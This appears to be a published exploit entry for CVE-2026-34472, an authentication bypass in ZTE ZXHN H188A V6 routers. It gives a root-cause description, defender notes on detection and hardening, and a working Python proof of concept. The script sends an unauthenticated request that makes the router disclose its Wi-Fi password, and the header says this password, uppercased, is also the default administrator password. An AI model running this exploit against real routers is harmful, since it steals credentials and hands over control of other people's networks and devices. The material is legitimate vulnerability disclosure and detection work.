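# Exploit Title: ZTE ZXHN H188A V6 - Authentication Bypass
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link: https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router
# Version: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE
# Tested on: ZTE ZXHN H188A V6.0.10P2_TE
# CVE: CVE-2026-34472
# Description:
# Unauthenticated requests to the root path of ZTE ZXHN H188A V6 firmware
# can reach pre-login wizard handlers and disclose WLAN PSKs, SSIDs, and
# PPPoE usernames. The leaked Wi-Fi password is also the default administrator
# password after uppercasing, resulting in full authentication bypass.
#
# Root cause: router_logic_impl.lua accepts _type and _tag directly for
# empty-path requests. urlpath_2type_modifier.lua only applies QuickSetupEnable
# when _type is missing. Wizard handlers then expose credential-bearing read
# actions (getPassword, wlan_get, ppp_get) for unauthenticated users.
#
# Approximately 500 publicly exposed H188A interfaces were reachable at
# time of original report (May 2024). ZTE PSIRT stopped responding; CVE
# assigned by MITRE on 2026-03-27 after escalation.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34472
#
# Defender notes (derived from the description above):
# - Detection: the request is an unauthenticated POST to the root path that
#   carries both `_type` and `_tag` query parameters and an `IF_ACTION` form
#   field naming a read action (getPassword, wlan_get, ppp_get). A
#   session-less request of that shape in front of the management interface
#   is worth alerting on.
# - Exposure: the header reports WAN-reachable management interfaces, so
#   confirm that the web UI is not reachable from outside the LAN.
# - Credentials: because the default administrator password is the Wi-Fi
#   password uppercased, the two secrets must be changed independently; a
#   device left on defaults loses both when the PSK is disclosed.
# - This header names no fixed firmware release; check the vendor advisory
#   before assuming an update closes the issue.

# PoC - Trigger wizard credential endpoint (Python 3 / requests)
import requests
import sys


def exploit(target: str) -> None:
    """Send the single pre-login wizard request and print the response.

    One POST goes to ``http://<target>/`` with ``_type`` and ``_tag`` in the
    query string and ``IF_ACTION=getPassword`` in the form body. The HTTP
    status and the first 2000 characters of the body are printed.

    The ``[+]`` line only means that a response arrived. It is printed for
    every status code, so the body has to be read to decide whether the
    device actually disclosed anything.

    Args:
        target: Host (optionally ``host:port``) of the device's web interface.
    """
    url = f"http://{target}/"
    # Per the description above, supplying `_type` is what keeps the
    # QuickSetupEnable check from being applied to this request.
    params = {"_type": "loginData", "_tag": "login_entry"}
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = {
        "IF_ACTION": "getPassword",
        "_InstID_PASS": "DEV.WIFI.AP1.PSK1",
        "PASSTYPE": "PSK",
    }
    try:
        # The URL is always plain http://, so the original `verify=False`
        # had no effect and is dropped rather than left as a habit.
        r = requests.post(
            url, params=params, headers=headers, data=data, timeout=10
        )
    except requests.RequestException as e:
        # Catch transport errors only; programming errors should surface.
        print(f"[-] {target}: {e}")
        return
    print(f"[+] {target} HTTP {r.status_code}")
    # On an affected device this output can contain the WLAN PSK. Treat
    # terminal scrollback and saved logs as sensitive.
    print(r.text[:2000])


if __name__ == "__main__":
    if len(sys.argv) < 2:
        # The argument placeholder was missing from the usage text.
        print("Usage: poc.py <target>", file=sys.stderr)
        sys.exit(1)
    exploit(sys.argv[1])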